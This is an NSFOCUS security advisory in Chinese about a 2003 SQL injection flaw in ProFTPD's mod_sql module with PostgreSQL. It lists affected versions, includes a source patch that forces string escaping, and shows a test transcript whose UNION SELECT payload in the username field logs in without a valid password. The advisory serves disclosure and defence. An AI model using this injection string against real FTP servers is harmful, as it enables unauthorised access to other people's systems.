安全研究
安全漏洞
ProFTPD SQL mod_sql注入漏洞
发布日期:2003-06-19
更新日期:2003-06-26
受影响系统:
ProFTPD Project ProFTPD 1.2rc3描述:
ProFTPD Project ProFTPD 1.2pre9
ProFTPD Project ProFTPD 1.2pre8
ProFTPD Project ProFTPD 1.2pre7
ProFTPD Project ProFTPD 1.2pre6
ProFTPD Project ProFTPD 1.2pre5
ProFTPD Project ProFTPD 1.2pre4
ProFTPD Project ProFTPD 1.2pre3
ProFTPD Project ProFTPD 1.2pre2
ProFTPD Project ProFTPD 1.2pre11
ProFTPD Project ProFTPD 1.2pre10
ProFTPD Project ProFTPD 1.2pre1
ProFTPD Project ProFTPD 1.2.9 rc1
ProFTPD Project ProFTPD 1.2.8
ProFTPD Project ProFTPD 1.2.7 rc3
ProFTPD Project ProFTPD 1.2.7 rc2
ProFTPD Project ProFTPD 1.2.7 rc1
ProFTPD Project ProFTPD 1.2.7
ProFTPD Project ProFTPD 1.2.6
ProFTPD Project ProFTPD 1.2.5
ProFTPD Project ProFTPD 1.2.4
ProFTPD Project ProFTPD 1.2.3
ProFTPD Project ProFTPD 1.2.2
ProFTPD Project ProFTPD 1.2.1
ProFTPD Project ProFTPD 1.2
- Conectiva Linux 7.0
- Conectiva Linux 6.0
- Conectiva Linux 5.1
- Conectiva Linux 5.0
- Mandrake Linux 8.2
- Mandrake Linux 8.1
- Mandrake Linux 8.0
- Mandrake Linux 7.2
BUGTRAQ ID: 7974
ProFTPD是一款开放源代码FTP服务程序。
ProFTPD使用mod_sql模块操作PostgreSQL数据库时存在SQL注入攻击,远程攻击者可以用这个漏洞在登录FTP服务器时提供恶意SQL命令,可能未授权访问FTP服务器。
攻击者可以在用户名和密码字段输入恶意SQL命令,可导致修改原来的SQL逻辑,造成无需密码访问FTP服务器。
<*来源:runlevel (runlevel@linuxmail.org)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Name (localhost:runlevel): ')UNION SELECT
'u','p',1001,1001,'/tmp','/bin/bash' WHERE(''='
331 Password required for ')UNION.
Password:
230 User ')UNION SELECT 'u','p',1001,1001,'/tmp'
,'/bin/bash' WHERE(''=' logged in.
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 采用如下补丁,不过下面的补丁如果PostgreSQL必须7.2版本以上,否则会引起mod_sql_postgres失败:
Index: contrib/mod_sql_postgres.c
===================================================================
RCS file: /cvsroot/proftp/proftpd/contrib/mod_sql_postgres.c,v
retrieving revision 1.15
diff -u -r1.15 mod_sql_postgres.c
--- contrib/mod_sql_postgres.c 29 May 2003 07:29:43 -0000 1.15
+++ contrib/mod_sql_postgres.c 17 Jun 2003 20:52:30 -0000
@@ -1105,23 +1105,13 @@
conn = (db_conn_t *) entry->data;
/* Note: the PQescapeString() function appeared in the C API as of
- * Postgres-7.2; this macro allows for functioning with older postgres
- * installations. Unfortunately, Postgres' PG_VERSION is defined as
- * a string, not an actual number, which makes for preprocessor-time checking
- * of that value much harder.
- *
- * Ideally, this function could be detected by a configure script, but
- * ProFTPD does not yet support per-module configure scripts.
+ * Postgres-7.2.
*/
-#ifndef POSTGRES_NO_PQESCAPESTRING
unescaped = cmd->argv[1];
escaped = (char *) pcalloc(cmd->tmp_pool, sizeof(char) *
(strlen(unescaped) * 2) + 1);
PQescapeString(escaped, unescaped, strlen(unescaped));
-#else
- escaped = cmd->argv[1];
-#endif
sql_log(DEBUG_FUNC, "%s", "exiting \tpostgres cmd_escapestring");
return mod_create_data(cmd, (void *) escaped);
厂商补丁:
ProFTPD Project
---------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.proftpd.org/
浏览次数:5968
严重程度:0(网友投票)
绿盟科技给您安全的保障